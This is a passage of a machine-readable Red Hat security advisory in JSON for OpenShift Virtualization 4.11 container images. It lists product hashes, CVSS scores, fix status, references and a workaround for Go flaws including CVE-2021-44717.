environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: net/http: limit growth of header canonicalization cache" }, { "cve": "CVE-2021-44717", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2021-12-09T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030806" } ], "notes": [ { "category": "description", "text": "There\u0027s a flaw in golang\u0027s syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: syscall: don\u0027t close fd 0 on ForkExec error", "title": "Vulnerability summary" }, { "category": "other", "text": "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw\u0027s impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44717" }, { "category": "external", "summary": "RHBZ#2030806", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030806" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44717", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44717" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44717" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", "url": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k" } ], "release_date": "2021-12-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" }, { "category": "workaround", "details": "This bug can be mitigated by raising the per-process file descriptor limit.", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", 